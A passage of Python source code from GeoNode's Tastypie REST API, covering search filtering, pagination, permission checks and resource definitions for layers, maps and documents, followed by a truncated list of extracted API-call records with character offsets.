elif type in LAYER_SUBTYPES.keys():
subtypes.append(type)
if 'vector' in subtypes and 'vector_time' not in subtypes:
subtypes.append('vector_time')
if len(subtypes) > 0:
types.append("layer")
sqs = SearchQuerySet().narrow(f"subtype:{','.join(map(str, subtypes))}")
if len(types) > 0:
sqs = (SearchQuerySet() if sqs is None else sqs).narrow(
f"type:{','.join(map(str, types))}")
# Filter by Query Params
# haystack bug? if boosted fields aren't included in the
# query, then the score won't be affected by the boost
if query:
if query.startswith('"') or query.startswith('\''):
# Match exact phrase
phrase = query.replace('"', '')
sqs = (SearchQuerySet() if sqs is None else sqs).filter(
SQ(title__exact=phrase) |
SQ(description__exact=phrase) |
SQ(content__exact=phrase)
)
else:
words = [
w for w in re.split(
r'\W',
query,
flags=re.UNICODE) if w]
for i, search_word in enumerate(words):
if i == 0:
sqs = (SearchQuerySet() if sqs is None else sqs) \
.filter(
SQ(title=Raw(search_word)) |
SQ(description=Raw(search_word)) |
SQ(content=Raw(search_word))
)
elif search_word in {"AND", "OR"}:
pass
elif words[i - 1] == "OR": # previous word OR this word
sqs = sqs.filter_or(
SQ(title=Raw(search_word)) |
SQ(description=Raw(search_word)) |
SQ(content=Raw(search_word))
)
else: # previous word AND this word
sqs = sqs.filter(
SQ(title=Raw(search_word)) |
SQ(description=Raw(search_word)) |
SQ(content=Raw(search_word))
)
# filter by category
if category:
sqs = (SearchQuerySet() if sqs is None else sqs).narrow(
f"category:{','.join(map(str, category))}")
# filter by keyword: use filter_or with keywords_exact
# not using exact leads to fuzzy matching and too many results
# using narrow with exact leads to zero results if multiple keywords
# selected
if keywords:
for keyword in keywords:
sqs = (
SearchQuerySet() if sqs is None else sqs).filter_or(
keywords_exact=keyword)
# filter by regions: use filter_or with regions_exact
# not using exact leads to fuzzy matching and too many results
# using narrow with exact leads to zero results if multiple keywords
# selected
if regions:
for region in regions:
sqs = (
SearchQuerySet() if sqs is None else sqs).filter_or(
regions_exact__exact=region)
# filter by owner
if owner:
sqs = (
SearchQuerySet() if sqs is None else sqs).narrow(
f"owner__username:{','.join(map(str, owner))}")
# filter by date
if date_start:
sqs = (SearchQuerySet() if sqs is None else sqs).filter(
SQ(date__gte=date_start)
)
if date_end:
sqs = (SearchQuerySet() if sqs is None else sqs).filter(
SQ(date__lte=date_end)
)
# Filter by geographic bounding box
if bbox:
left, bottom, right, top = bbox.split(',')
sqs = (
SearchQuerySet() if sqs is None else sqs).exclude(
SQ(
bbox_top__lte=bottom) | SQ(
bbox_bottom__gte=top) | SQ(
bbox_left__gte=right) | SQ(
bbox_right__lte=left))
# Apply sort
if sort.lower() == "-date":
sqs = (
SearchQuerySet() if sqs is None else sqs).order_by("-date")
elif sort.lower() == "date":
sqs = (
SearchQuerySet() if sqs is None else sqs).order_by("date")
elif sort.lower() == "title":
sqs = (SearchQuerySet() if sqs is None else sqs).order_by(
"title_sortable")
elif sort.lower() == "-title":
sqs = (SearchQuerySet() if sqs is None else sqs).order_by(
"-title_sortable")
elif sort.lower() == "-popular_count":
sqs = (SearchQuerySet() if sqs is None else sqs).order_by(
"-popular_count")
else:
sqs = (
SearchQuerySet() if sqs is None else sqs).order_by("-date")
return sqs
def get_search(self, request, **kwargs):
self.method_check(request, allowed=['get'])
self.is_authenticated(request)
self.throttle_check(request)
# Get the list of objects that matches the filter
sqs = self.build_haystack_filters(request.GET)
if not settings.SKIP_PERMS_FILTER:
filter_set = get_objects_for_user(
request.user, 'base.view_resourcebase')
filter_set = get_visible_resources(
filter_set,
request.user if request else None,
admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,
unpublished_not_visible=settings.RESOURCE_PUBLISHING,
private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)
filter_set_ids = filter_set.values_list('id')
# Do the query using the filterset and the query term. Facet the
# results
if len(filter_set) > 0:
sqs = sqs.filter(id__in=filter_set_ids).facet('type').facet('subtype').facet(
'owner') .facet('keywords').facet('regions').facet('category')
else:
sqs = None
else:
sqs = sqs.facet('type').facet('subtype').facet(
'owner').facet('keywords').facet('regions').facet('category')
if sqs:
# Build the Facet dict
facets = {}
for facet in sqs.facet_counts()['fields']:
facets[facet] = {}
for item in sqs.facet_counts()['fields'][facet]:
facets[facet][item[0]] = item[1]
# Paginate the results
paginator = Paginator(sqs, request.GET.get('limit'))
try:
page = paginator.page(
int(request.GET.get('offset') or 0) /
int(request.GET.get('limit') or 0 + 1))
except InvalidPage:
raise Http404("Sorry, no results on that page.")
if page.has_previous():
previous_page = page.previous_page_number()
else:
previous_page = 1
if page.has_next():
next_page = page.next_page_number()
else:
next_page = 1
total_count = sqs.count()
objects = page.object_list
else:
next_page = 0
previous_page = 0
total_count = 0
facets = {}
objects = []
object_list = {
"meta": {
"limit": settings.CLIENT_RESULTS_LIMIT,
"next": next_page,
"offset": int(getattr(request.GET, 'offset', 0)),
"previous": previous_page,
"total_count": total_count,
"facets": facets,
},
"objects": [self.get_haystack_api_fields(x) for x in objects],
}
self.log_throttled_access(request)
return self.create_response(request, object_list)
def get_haystack_api_fields(self, haystack_object):
return {k: v for k, v in haystack_object.get_stored_fields().items()
if not re.search('_exact$|_sortable$', k)}
def get_list(self, request, **kwargs):
"""
Returns a serialized list of resources.
Calls ``obj_get_list`` to provide the data, then handles that result
set and serializes it.
Should return a HttpResponse (200 OK).
"""
# TODO: Uncached for now. Invalidation that works for everyone may be
# impossible.
base_bundle = self.build_bundle(request=request)
objects = self.obj_get_list(
bundle=base_bundle,
**self.remove_api_resource_names(kwargs))
sorted_objects = self.apply_sorting(objects, options=request.GET)
paginator = self._meta.paginator_class(
request.GET,
sorted_objects,
resource_uri=self.get_resource_uri(),
limit=self._meta.limit,
max_limit=self._meta.max_limit,
collection_name=self._meta.collection_name)
to_be_serialized = paginator.page()
to_be_serialized = self.alter_list_data_to_serialize(
request,
to_be_serialized)
return self.create_response(
request, to_be_serialized, response_objects=objects)
def format_objects(self, objects):
"""
Format the objects for output in a response.
"""
for key in ('site_url', 'has_time'):
if key in self.VALUES:
idx = self.VALUES.index(key)
del self.VALUES[idx]
# hack needed because dehydrate does not seem to work in CommonModelApi
formatted_objects = []
for obj in objects:
formatted_obj = model_to_dict(obj, fields=self.VALUES)
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
if formatted_obj['thumbnail_url'] and len(formatted_obj['thumbnail_url']) == 0:
formatted_obj['thumbnail_url'] = staticfiles.static(settings.MISSING_THUMBNAIL)
formatted_obj['owner__username'] = obj.owner.username
formatted_obj['owner_name'] = obj.owner.get_full_name() or obj.owner.username
# replace thumbnail_url with curated_thumbs
if hasattr(obj, 'curatedthumbnail'):
if hasattr(obj.curatedthumbnail.img_thumbnail, 'url'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
else:
formatted_obj['thumbnail_url'] = ''
formatted_objects.append(formatted_obj)
return formatted_objects
def create_response(
self,
request,
data,
response_class=HttpResponse,
response_objects=None,
**response_kwargs):
"""
Extracts the common "which-format/serialize/return-response" cycle.
Mostly a useful shortcut/hook.
"""
# If an user does not have at least view permissions, he won't be able
# to see the resource at all.
filtered_objects_ids = None
try:
if data['objects']:
filtered_objects_ids = [
item.id for item in data['objects'] if request.user.has_perm(
'view_resourcebase', item.get_self_resource())]
except Exception:
pass
if isinstance(
data,
dict) and 'objects' in data and not isinstance(
data['objects'],
list):
if filtered_objects_ids:
data['objects'] = [
x for x in list(
self.format_objects(
data['objects'])) if x['id'] in filtered_objects_ids]
else:
data['objects'] = list(self.format_objects(data['objects']))
# give geonode version
data['geonode_version'] = get_version()
desired_format = self.determine_format(request)
serialized = self.serialize(request, data, desired_format)
return response_class(
content=serialized,
content_type=build_content_type(desired_format),
**response_kwargs)
def prepend_urls(self):
if settings.HAYSTACK_SEARCH:
return [
url(r"^(?P<resource_name>%s)/search%s$" % (
self._meta.resource_name, trailing_slash()
),
self.wrap_view('get_search'), name="api_get_search"),
]
else:
return []
class ResourceBaseResource(CommonModelApi):
"""ResourceBase api"""
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = ResourceBase.objects.polymorphic_queryset() \
.distinct().order_by('-date')
resource_name = 'base'
excludes = ['csw_anytext', 'metadata_xml']
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
class FeaturedResourceBaseResource(CommonModelApi):
"""Only the featured resourcebases"""
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = ResourceBase.objects.filter(featured=True).order_by('-date')
resource_name = 'featured'
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
class LayerResource(CommonModelApi):
"""Layer API"""
links = fields.ListField(
attribute='links',
null=True,
use_in='all',
default=[])
if check_ogc_backend(qgis_server.BACKEND_PACKAGE):
default_style = fields.ForeignKey(
'geonode.api.api.StyleResource',
attribute='qgis_default_style',
null=True)
styles = fields.ManyToManyField(
'geonode.api.api.StyleResource',
attribute='qgis_styles',
null=True,
use_in='detail')
elif check_ogc_backend(geoserver.BACKEND_PACKAGE):
default_style = fields.ForeignKey(
'geonode.api.api.StyleResource',
attribute='default_style',
null=True)
styles = fields.ManyToManyField(
'geonode.api.api.StyleResource',
attribute='styles',
null=True,
use_in='detail')
def format_objects(self, objects):
"""
Formats the object.
"""
formatted_objects = []
for obj in objects:
# convert the object to a dict using the standard values.
# includes other values
values = self.VALUES + [
'alternate',
'name'
]
formatted_obj = model_to_dict(obj, fields=values)
username = obj.owner.get_username()
full_name = (obj.owner.get_full_name() or username)
formatted_obj['owner__username'] = username
formatted_obj['owner_name'] = full_name
if obj.category:
formatted_obj['category__gn_description'] = _(obj.category.gn_description)
if obj.group:
formatted_obj['group'] = obj.group
try:
formatted_obj['group_name'] = GroupProfile.objects.get(slug=obj.group.name)
except GroupProfile.DoesNotExist:
formatted_obj['group_name'] = obj.group
formatted_obj['keywords'] = [k.name for k in obj.keywords.all()] if obj.keywords else []
formatted_obj['regions'] = [r.name for r in obj.regions.all()] if obj.regions else []
# provide style information
bundle = self.build_bundle(obj=obj)
formatted_obj['default_style'] = self.default_style.dehydrate(
bundle, for_list=True)
# Add resource uri
formatted_obj['resource_uri'] = self.get_resource_uri(bundle)
formatted_obj['links'] = self.dehydrate_ogc_links(bundle)
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
# Probe Remote Services
formatted_obj['store_type'] = 'dataset'
formatted_obj['online'] = True
if hasattr(obj, 'storeType'):
formatted_obj['store_type'] = obj.storeType
if obj.storeType == 'remoteStore' and hasattr(obj, 'remote_service'):
if obj.remote_service:
formatted_obj['online'] = (obj.remote_service.probe == 200)
else:
formatted_obj['online'] = False
formatted_obj['gtype'] = self.dehydrate_gtype(bundle)
# replace thumbnail_url with curated_thumbs
if hasattr(obj, 'curatedthumbnail'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
formatted_obj['processed'] = obj.instance_is_processed
# put the object on the response stack
formatted_objects.append(formatted_obj)
return formatted_objects
def _dehydrate_links(self, bundle, link_types=None):
"""Dehydrate links field."""
dehydrated = []
obj = bundle.obj
link_fields = [
'extension',
'link_type',
'name',
'mime',
'url'
]
links = obj.link_set.all()
if link_types:
links = links.filter(link_type__in=link_types)
for lnk in links:
formatted_link = model_to_dict(lnk, fields=link_fields)
dehydrated.append(formatted_link)
return dehydrated
def dehydrate_links(self, bundle):
return self._dehydrate_links(bundle)
def dehydrate_ogc_links(self, bundle):
return self._dehydrate_links(bundle, ['OGC:WMS', 'OGC:WFS', 'OGC:WCS'])
def dehydrate_gtype(self, bundle):
return bundle.obj.gtype
def populate_object(self, obj):
"""Populate results with necessary fields
:param obj: Layer obj
:type obj: Layer
:return:
"""
if check_ogc_backend(qgis_server.BACKEND_PACKAGE):
# Provides custom links for QGIS Server styles info
# Default style
try:
obj.qgis_default_style = obj.qgis_layer.default_style
except Exception:
obj.qgis_default_style = None
# Styles
try:
obj.qgis_styles = obj.qgis_layer.styles
except Exception:
obj.qgis_styles = []
return obj
def build_bundle(
self, obj=None, data=None, request=None, **kwargs):
"""Override build_bundle method to add additional info."""
if obj is None and self._meta.object_class:
obj = self._meta.object_class()
elif obj:
obj = self.populate_object(obj)
return Bundle(
obj=obj,
data=data,
request=request, **kwargs)
def patch_detail(self, request, **kwargs):
"""Allow patch request to update default_style.
Request body must match this:
{
'default_style': <resource_uri_to_style>
}
"""
reason = 'Can only patch "default_style" field.'
try:
body = json.loads(request.body)
if 'default_style' not in body:
return http.HttpBadRequest(reason=reason)
match = resolve(body['default_style'])
style_id = match.kwargs['id']
api_name = match.kwargs['api_name']
resource_name = match.kwargs['resource_name']
if not (resource_name == 'styles' and api_name == 'api'):
raise Exception()
from geonode.qgis_server.models import QGISServerStyle
style = QGISServerStyle.objects.get(id=style_id)
layer_id = kwargs['id']
layer = Layer.objects.get(id=layer_id)
except Exception:
return http.HttpBadRequest(reason=reason)
from geonode.qgis_server.views import default_qml_style
request.method = 'POST'
response = default_qml_style(
request,
layername=layer.name,
style_name=style.name)
if isinstance(response, TemplateResponse):
if response.status_code == 200:
return HttpResponse(status=200)
return self.error_response(request, response.content)
# copy parent attribute before modifying
VALUES = CommonModelApi.VALUES[:]
VALUES.append('typename')
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = Layer.objects.distinct().order_by('-date')
resource_name = 'layers'
detail_uri_name = 'id'
include_resource_uri = True
allowed_methods = ['get', 'patch']
excludes = ['csw_anytext', 'metadata_xml']
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
filtering = CommonMetaApi.filtering
# Allow filtering using ID
filtering.update({
'id': ALL,
'name': ALL,
'alternate': ALL,
})
class MapResource(CommonModelApi):
"""Maps API"""
def format_objects(self, objects):
"""
Formats the objects and provides reference to list of layers in map
resources.
:param objects: Map objects
"""
formatted_objects = []
for obj in objects:
# convert the object to a dict using the standard values.
formatted_obj = model_to_dict(obj, fields=self.VALUES)
username = obj.owner.get_username()
full_name = (obj.owner.get_full_name() or username)
formatted_obj['owner__username'] = username
formatted_obj['owner_name'] = full_name
if obj.category:
formatted_obj['category__gn_description'] = _(obj.category.gn_description)
if obj.group:
formatted_obj['group'] = obj.group
try:
formatted_obj['group_name'] = GroupProfile.objects.get(slug=obj.group.name)
except GroupProfile.DoesNotExist:
formatted_obj['group_name'] = obj.group
formatted_obj['keywords'] = [k.name for k in obj.keywords.all()] if obj.keywords else []
formatted_obj['regions'] = [r.name for r in obj.regions.all()] if obj.regions else []
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
# Probe Remote Services
formatted_obj['store_type'] = 'map'
formatted_obj['online'] = True
# get map layers
map_layers = obj.layers
formatted_layers = []
map_layer_fields = [
'id',
'stack_order',
'format',
'name',
'opacity',
'group',
'visibility',
'transparent',
'ows_url',
'layer_params',
'source_params',
'local'
]
for layer in map_layers:
formatted_map_layer = model_to_dict(
layer, fields=map_layer_fields)
formatted_layers.append(formatted_map_layer)
formatted_obj['layers'] = formatted_layers
# replace thumbnail_url with curated_thumbs
try:
if hasattr(obj, 'curatedthumbnail'):
if hasattr(obj.curatedthumbnail.img_thumbnail, 'url'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
else:
formatted_obj['thumbnail_url'] = ''
except Exception as e:
formatted_obj['thumbnail_url'] = ''
logger.exception(e)
formatted_objects.append(formatted_obj)
return formatted_objects
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
queryset = Map.objects.distinct().order_by('-date')
resource_name = 'maps'
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
class DocumentResource(CommonModelApi):
"""Documents API"""
def format_objects(self, objects):
"""
Formats the objects and provides reference to list of layers in map
resources.
:param objects: Map objects
"""
formatted_objects = []
for obj in objects:
# convert the object to a dict using the standard values.
formatted_obj = model_to_dict(obj, fields=self.VALUES)
username = obj.owner.get_username()
full_name = (obj.owner.get_full_name() or username)
formatted_obj['owner__username'] = username
formatted_obj['owner_name'] = full_name
if obj.category:
formatted_obj['category__gn_description'] = _(obj.category.gn_description)
if obj.group:
formatted_obj['group'] = obj.group
try:
formatted_obj['group_name'] = GroupProfile.objects.get(slug=obj.group.name)
except GroupProfile.DoesNotExist:
formatted_obj['group_name'] = obj.group
formatted_obj['keywords'] = [k.name for k in obj.keywords.all()] if obj.keywords else []
formatted_obj['regions'] = [r.name for r in obj.regions.all()] if obj.regions else []
if 'site_url' not in formatted_obj or len(formatted_obj['site_url']) == 0:
formatted_obj['site_url'] = settings.SITEURL
# Probe Remote Services
formatted_obj['store_type'] = 'dataset'
formatted_obj['online'] = True
# replace thumbnail_url with curated_thumbs
if hasattr(obj, 'curatedthumbnail'):
try:
if hasattr(obj.curatedthumbnail.img_thumbnail, 'url'):
formatted_obj['thumbnail_url'] = obj.curatedthumbnail.thumbnail_url
else:
formatted_obj['thumbnail_url'] = ''
except Exception:
formatted_obj['thumbnail_url'] = ''
formatted_objects.append(formatted_obj)
return formatted_objects
class Meta(CommonMetaApi):
paginator_class = CrossSiteXHRPaginator
filtering = CommonMetaApi.filtering
filtering.update({'doc_type': ALL})
queryset = Document.objects.distinct().order_by('-date')
resource_name = 'documents'
authentication = MultiAuthentication(SessionAuthentication(),
OAuthAuthentication(),
GeonodeApiKeyAuthentication())
|
[
"tastypie.utils.trailing_slash",
"tastypie.fields.ManyToManyField",
"logging.getLogger",
"tastypie.utils.mime.build_content_type",
"geonode.base.models.HierarchicalKeyword.objects.none",
"haystack.query.SQ",
"guardian.shortcuts.get_objects_for_user",
"geonode.layers.models.Layer.objects.get",
"json.loads",
"django.utils.translation.gettext",
"django.http.HttpResponse",
"tastypie.fields.ForeignKey",
"geonode.layers.models.Layer.objects.distinct",
"geonode.base.models.HierarchicalKeyword.get_tree",
"haystack.inputs.Raw",
"geonode.base.models.ResourceBase.objects.polymorphic_queryset",
"django.urls.resolve",
"django.http.Http404",
"tastypie.http.HttpBadRequest",
"re.search",
"geonode.get_version",
"geonode.maps.models.Map.objects.distinct",
"re.split",
"geonode.security.utils.get_visible_resources",
"django.contrib.staticfiles.templatetags.staticfiles.static",
"tastypie.fields.ListField",
"geonode.base.models.ResourceBase.objects.filter",
"tastypie.fields.ToOneField",
"django.forms.models.model_to_dict",
"geonode.groups.models.GroupProfile.objects.get",
"geonode.utils.check_ogc_backend",
"tastypie.fields.ToManyField",
"geonode.qgis_server.views.default_qml_style",
"django.db.models.Q",
"haystack.query.SearchQuerySet",
"tastypie.bundle.Bundle",
"geonode.layers.models.Layer.objects.order_by",
"geonode.qgis_server.models.QGISServerStyle.objects.get",
"geonode.documents.models.Document.objects.distinct",
"tastypie.authentication.SessionAuthentication"
] |
[((2674, 2701), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (2691, 2701), False, 'import logging\n'), ((3456, 3510), 'tastypie.fields.ToManyField', 'fields.ToManyField', (['TagResource', '"""keywords"""'], {'null': '(True)'}), "(TagResource, 'keywords', null=True)\n", (3474, 3510), False, 'from tastypie import fields\n'), ((3525, 3581), 'tastypie.fields.ToManyField', 'fields.ToManyField', (['RegionResource', '"""regions"""'], {'null': '(True)'}), "(RegionResource, 'regions', null=True)\n", (3543, 3581), False, 'from tastypie import fields\n'), ((3597, 3671), 'tastypie.fields.ToOneField', 'fields.ToOneField', (['TopicCategoryResource', '"""category"""'], {'null': '(True)', 'full': '(True)'}), "(TopicCategoryResource, 'category', null=True, full=True)\n", (3614, 3671), False, 'from tastypie import fields\n'), ((3717, 3780), 'tastypie.fields.ToOneField', 'fields.ToOneField', (['GroupResource', '"""group"""'], {'null': '(True)', 'full': '(True)'}), "(GroupResource, 'group', null=True, full=True)\n", (3734, 3780), False, 'from tastypie import fields\n'), ((3826, 3879), 'tastypie.fields.ToOneField', 'fields.ToOneField', (['OwnersResource', '"""owner"""'], {'full': '(True)'}), "(OwnersResource, 'owner', full=True)\n", (3843, 3879), False, 'from tastypie import fields\n'), ((3896, 3964), 'tastypie.fields.ToManyField', 'fields.ToManyField', (['ThesaurusKeywordResource', '"""tkeywords"""'], {'null': '(True)'}), "(ThesaurusKeywordResource, 'tkeywords', null=True)\n", (3914, 3964), False, 'from tastypie import fields\n'), ((27125, 27197), 'tastypie.fields.ListField', 'fields.ListField', ([], {'attribute': '"""links"""', 'null': '(True)', 'use_in': '"""all"""', 'default': '[]'}), "(attribute='links', null=True, use_in='all', default=[])\n", (27141, 27197), False, 'from tastypie import fields\n'), ((27238, 27284), 'geonode.utils.check_ogc_backend', 'check_ogc_backend', (['qgis_server.BACKEND_PACKAGE'], {}), '(qgis_server.BACKEND_PACKAGE)\n', (27255, 27284), False, 'from geonode.utils import check_ogc_backend\n'), ((9146, 9349), 'geonode.security.utils.get_visible_resources', 'get_visible_resources', (['queryset', '(request.user if request else None)'], {'request': 'request', 'admin_approval_required': 'settings.ADMIN_MODERATE_UPLOADS', 'unpublished_not_visible': 'settings.RESOURCE_PUBLISHING'}), '(queryset, request.user if request else None, request=\n request, admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,\n unpublished_not_visible=settings.RESOURCE_PUBLISHING)\n', (9167, 9349), False, 'from geonode.security.utils import get_visible_resources\n'), ((9498, 9648), 'geonode.security.utils.get_visible_resources', 'get_visible_resources', (['queryset', '(request.user if request else None)'], {'request': 'request', 'private_groups_not_visibile': 'settings.GROUP_PRIVATE_RESOURCES'}), '(queryset, request.user if request else None, request=\n request, private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)\n', (9519, 9648), False, 'from geonode.security.utils import get_visible_resources\n'), ((9819, 9853), 'geonode.base.models.HierarchicalKeyword.objects.none', 'HierarchicalKeyword.objects.none', ([], {}), '()\n', (9851, 9853), False, 'from geonode.base.models import HierarchicalKeyword\n'), ((27310, 27408), 'tastypie.fields.ForeignKey', 'fields.ForeignKey', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""qgis_default_style"""', 'null': '(True)'}), "('geonode.api.api.StyleResource', attribute=\n 'qgis_default_style', null=True)\n", (27327, 27408), False, 'from tastypie import fields\n'), ((27458, 27571), 'tastypie.fields.ManyToManyField', 'fields.ManyToManyField', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""qgis_styles"""', 'null': '(True)', 'use_in': '"""detail"""'}), "('geonode.api.api.StyleResource', attribute=\n 'qgis_styles', null=True, use_in='detail')\n", (27480, 27571), False, 'from tastypie import fields\n'), ((27625, 27669), 'geonode.utils.check_ogc_backend', 'check_ogc_backend', (['geoserver.BACKEND_PACKAGE'], {}), '(geoserver.BACKEND_PACKAGE)\n', (27642, 27669), False, 'from geonode.utils import check_ogc_backend\n'), ((31812, 31858), 'geonode.utils.check_ogc_backend', 'check_ogc_backend', (['qgis_server.BACKEND_PACKAGE'], {}), '(qgis_server.BACKEND_PACKAGE)\n', (31829, 31858), False, 'from geonode.utils import check_ogc_backend\n'), ((32626, 32679), 'tastypie.bundle.Bundle', 'Bundle', ([], {'obj': 'obj', 'data': 'data', 'request': 'request'}), '(obj=obj, data=data, request=request, **kwargs)\n', (32632, 32679), False, 'from tastypie.bundle import Bundle\n'), ((33881, 33952), 'geonode.qgis_server.views.default_qml_style', 'default_qml_style', (['request'], {'layername': 'layer.name', 'style_name': 'style.name'}), '(request, layername=layer.name, style_name=style.name)\n', (33898, 33952), False, 'from geonode.qgis_server.views import default_qml_style\n'), ((6401, 6404), 'django.db.models.Q', 'Q', ([], {}), '()\n', (6402, 6404), False, 'from django.db.models import Q\n'), ((10363, 10385), 'django.db.models.Q', 'Q', ([], {'keywords__in': 'treeqs'}), '(keywords__in=treeqs)\n', (10364, 10385), False, 'from django.db.models import Q\n'), ((10716, 10739), 'django.db.models.Q', 'Q', ([], {'bbox_y1__lte': 'bbox[3]'}), '(bbox_y1__lte=bbox[3])\n', (10717, 10739), False, 'from django.db.models import Q\n'), ((18540, 18600), 'guardian.shortcuts.get_objects_for_user', 'get_objects_for_user', (['request.user', '"""base.view_resourcebase"""'], {}), "(request.user, 'base.view_resourcebase')\n", (18560, 18600), False, 'from guardian.shortcuts import get_objects_for_user\n'), ((18644, 18897), 'geonode.security.utils.get_visible_resources', 'get_visible_resources', (['filter_set', '(request.user if request else None)'], {'admin_approval_required': 'settings.ADMIN_MODERATE_UPLOADS', 'unpublished_not_visible': 'settings.RESOURCE_PUBLISHING', 'private_groups_not_visibile': 'settings.GROUP_PRIVATE_RESOURCES'}), '(filter_set, request.user if request else None,\n admin_approval_required=settings.ADMIN_MODERATE_UPLOADS,\n unpublished_not_visible=settings.RESOURCE_PUBLISHING,\n private_groups_not_visibile=settings.GROUP_PRIVATE_RESOURCES)\n', (18665, 18897), False, 'from geonode.security.utils import get_visible_resources\n'), ((23040, 23078), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'self.VALUES'}), '(obj, fields=self.VALUES)\n', (23053, 23078), False, 'from django.forms.models import model_to_dict\n'), ((25343, 25356), 'geonode.get_version', 'get_version', ([], {}), '()\n', (25354, 25356), False, 'from geonode import get_version, qgis_server, geoserver\n'), ((26378, 26401), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (26399, 26401), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((26884, 26907), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (26905, 26907), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((27695, 27788), 'tastypie.fields.ForeignKey', 'fields.ForeignKey', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""default_style"""', 'null': '(True)'}), "('geonode.api.api.StyleResource', attribute=\n 'default_style', null=True)\n", (27712, 27788), False, 'from tastypie import fields\n'), ((27838, 27945), 'tastypie.fields.ManyToManyField', 'fields.ManyToManyField', (['"""geonode.api.api.StyleResource"""'], {'attribute': '"""styles"""', 'null': '(True)', 'use_in': '"""detail"""'}), "('geonode.api.api.StyleResource', attribute='styles',\n null=True, use_in='detail')\n", (27860, 27945), False, 'from tastypie import fields\n'), ((28379, 28412), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'values'}), '(obj, fields=values)\n', (28392, 28412), False, 'from django.forms.models import model_to_dict\n'), ((31236, 31274), 'django.forms.models.model_to_dict', 'model_to_dict', (['lnk'], {'fields': 'link_fields'}), '(lnk, fields=link_fields)\n', (31249, 31274), False, 'from django.forms.models import model_to_dict\n'), ((33036, 33060), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (33046, 33060), False, 'import json\n'), ((33183, 33213), 'django.urls.resolve', 'resolve', (["body['default_style']"], {}), "(body['default_style'])\n", (33190, 33213), False, 'from django.urls import resolve\n'), ((33555, 33595), 'geonode.qgis_server.models.QGISServerStyle.objects.get', 'QGISServerStyle.objects.get', ([], {'id': 'style_id'}), '(id=style_id)\n', (33582, 33595), False, 'from geonode.qgis_server.models import QGISServerStyle\n'), ((33653, 33683), 'geonode.layers.models.Layer.objects.get', 'Layer.objects.get', ([], {'id': 'layer_id'}), '(id=layer_id)\n', (33670, 33683), False, 'from geonode.layers.models import Layer\n'), ((34692, 34715), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (34713, 34715), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((35466, 35504), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'self.VALUES'}), '(obj, fields=self.VALUES)\n', (35479, 35504), False, 'from django.forms.models import model_to_dict\n'), ((38168, 38191), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (38189, 38191), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((38757, 38795), 'django.forms.models.model_to_dict', 'model_to_dict', (['obj'], {'fields': 'self.VALUES'}), '(obj, fields=self.VALUES)\n', (38770, 38795), False, 'from django.forms.models import model_to_dict\n'), ((40791, 40814), 'tastypie.authentication.SessionAuthentication', 'SessionAuthentication', ([], {}), '()\n', (40812, 40814), False, 'from tastypie.authentication import MultiAuthentication, SessionAuthentication\n'), ((6481, 6485), 'django.db.models.Q', 'Q', (['f'], {}), '(f)\n', (6482, 6485), False, 'from django.db.models import Q\n'), ((10690, 10713), 'django.db.models.Q', 'Q', ([], {'bbox_y0__gte': 'bbox[1]'}), '(bbox_y0__gte=bbox[1])\n', (10691, 10713), False, 'from django.db.models import Q\n'), ((16728, 16752), 'haystack.query.SQ', 'SQ', ([], {'date__gte': 'date_start'}), '(date__gte=date_start)\n', (16730, 16752), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((16874, 16896), 'haystack.query.SQ', 'SQ', ([], {'date__lte': 'date_end'}), '(date__lte=date_end)\n', (16876, 16896), False, 'from haystack.query import SearchQuerySet, SQ\n'), ((23369, 23415), 'django.contrib.staticfiles.templatetags.staticfiles.static', 'staticfiles.static', (['settings.MISSING_THUMBNAIL'], {}), '(settings.MISSING_THUMBNAIL)\n', (23387, 23415), False, 'from django.contrib.staticfiles.templatetags import staticfiles\n'), ((25570, 25604), 'tastypie.utils.mime.build_content_type', 'build_content_type', (['desired_format'], {}), '(desired_format)\n', (25588, 25604), False, 'from tastypie.utils.mime import build_content_type\n'), ((26743, 26785), 'geonode.base.models.ResourceBase.objects.filter', 'ResourceBase.objects.filter', ([], {'featured': '(True)'}), '(featured=True)\n', (26770, 26785), False, 'from geonode.base.models import ResourceBase\n'), ((28722, 28752), 